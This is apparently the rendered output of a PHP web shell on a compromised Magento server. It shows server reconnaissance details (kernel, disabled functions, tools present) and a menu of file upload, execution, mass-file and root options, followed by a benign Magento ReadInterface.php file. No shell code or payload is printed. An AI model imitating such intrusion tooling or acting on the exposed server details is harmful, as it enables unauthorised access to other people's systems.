Kernel : Linux vmi616275.contaboserver.net 5.4.0-84-generic #94-Ubuntu SMP Thu Aug 26 20:27:37 UTC 2021 x86_64
Disable function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Safe mode : OFF
Host : diestoffstrasse.com | Server ip : 127.0.0.1 | Your ip : 127.0.0.1 | Time @ Server : 24 Aug 2025 03:00:32
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/dev2.destoffenstraat.com/vendor-1/magento/framework/Filesystem/Directory/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/dev2.destoffenstraat.com/vendor-1/magento/framework/Filesystem/Directory/ReadInterface.php

<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ namespace Magento\Framework\Filesystem\Directory; /** * Interface \Magento\Framework\Filesystem\Directory\ReadInterface * @api * @since 100.0.2 */ interface ReadInterface { /** * Get absolute path * * @param string $path [optional] * @return string */ public function getAbsolutePath($path = null); /** * Get relative path * * @param string $path * @return string */ public function getRelativePath($path = null); /** * Retrieve list of all entities in given path * * @param string $path [optional] * @return array */ public function read($path = null); /** * Search all entries for given regex pattern * * @param string $pattern * @param string $path [optional] * @return array */ public function search($pattern, $path = null); /** * Check a file or directory exists * * @param string $path [optional] * @return bool */ public function isExist($path = null); /** * Gathers the statistics of the given path * * @param string $path * @return array */ public function stat($path); /** * Check permissions for reading file or directory * * @param string $path [optional] * @return bool */ public function isReadable($path = null); /** * Check whether given path is file * * @param string $path * @return bool */ public function isFile($path); /** * Check whether given path is directory * * @param string $path [optional] * @return bool */ public function isDirectory($path = null); /** * Open file in read mode * * @param string $path * @return \Magento\Framework\Filesystem\File\ReadInterface * @throws \Magento\Framework\Exception\FileSystemException */ public function openFile($path); /** * Retrieve file contents from given path * * @param string $path * @param string|null $flag * @param resource|null $context * @return string * @throws \Magento\Framework\Exception\FileSystemException */ public function readFile($path, $flag = null, $context = null); }